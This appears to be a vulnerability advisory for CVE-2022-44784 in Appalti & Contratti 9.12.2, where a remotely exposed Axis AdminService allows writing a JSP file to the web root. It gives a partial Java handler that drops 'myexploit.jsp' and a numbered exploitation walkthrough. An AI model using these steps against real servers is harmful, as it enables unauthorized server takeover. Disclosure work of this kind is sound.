CVE-2022-44784 - Vulnerabilities in Appalti & Contratti 9.12.2 Lead to Remote Access of Axis AdminService and Arbitrary Service Creation
An issue was recently discovered in Appalti & Contratti, a web application used for managing contracts and tenders. The vulnerability, found in version 9.12.2, potentially allows remote attackers to access the Axis AdminService for the target web applications LFS and DL229 and create arbitrary services on the server side. This post will explain the details of this security issue and provide a walkthrough of the exploit process.
Description of the Vulnerability
The target web applications LFS and DL229 expose a set of services provided by the Axis 1.4 instance, which is embedded directly into the applications. This was discovered through the leakage of the WEB-INF/web.xml file via Local File Inclusion. The Axis AdminService is among the exposed services, and according to the default configuration, it should only be accessible by localhost.
However, it was found that the AdminService can be reached by remote users in both LFS and DL229. This allows an attacker to create arbitrary services on the server side, which can lead to further exploitation of the system. The exploit procedure involved is documented in the Generic AXIS-SSRF exploitation article.
Code Snippet
The attack exploits the Axis AdminService by writing a JSP page inside the root directory of the web application through the org.apache.axis.handlers.LogHandler class. Here is an example of how this exploit may look:
package com.example;
import org.apache.axis.AxisFault;
import org.apache.axis.Message;
import org.apache.axis.MessageContext;
import org.apache.axis.handlers.BasicHandler;
import org.apache.axis.transport.http.HTTPConstants;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
public class CustomLogHandler extends BasicHandler {
@Override
public void invoke(MessageContext msgContext) throws AxisFault {
try {
String jspPath = msgContext.getAxisEngine().getOption("webappRoot") + "/myexploit.jsp";
BufferedWriter writer = new BufferedWriter(new FileWriter(jspPath));
writer.write("<%@ page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\" %>");
// More JSP code here...
writer.close();
HttpServletResponse response = (HttpServletResponse) msgContext.getProperty(HTTPConstants.MC_HTTP_SERVLETRESPONSE);
response.setStatus(HttpServletResponse.SC_OK);
response.getWriter().println("LogHandler successfully wrote custom JSP");
} catch (IOException e) {
throw AxisFault.makeFault(e);
}
}
}
This code snippet demonstrates a custom implementation of org.apache.axis.handlers.LogHandler that writes a JSP page containing exploit code to the root directory of the web application. Once the JSP page has been written, it can be executed by the attacker to gain control of the server.
Follow these steps to exploit this vulnerability
1. Access the target Axis AdminService by navigating to the appropriate URL (e.g., http://example.com/axis/services/AdminService).
2. Gather information about the target system, such as the server's web root directory, by analyzing the Local File Inclusion leak of the WEB-INF/web.xml file.
Author a malicious JSP page containing your exploit code.
4. Using the methods described in the Generic AXIS-SSRF exploitation article, deploy the the JSP page using a custom log handler.
5. Access the custom JSP page in the web application root directory (e.g., http://example.com/myexploit.jsp) to execute the exploit and potentially gain control of the server.
Conclusion
CVE-2022-44784 is a critical vulnerability that can allow remote attackers to gain unauthorized access to sensitive services and potentially take control of an organization's server. It is crucial for organizations using Appalti & Contratti 9.12.2 to update their systems and apply any security patches to mitigate the risks associated with this security issue.
Organizations should also regularly perform vulnerability assessments and penetration testing to discover and remediate potential security issues in their infrastructure. By staying vigilant against known and emerging threats, organizations can better protect their assets and mitigate risks.
Timeline
Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 20:00:00 UTC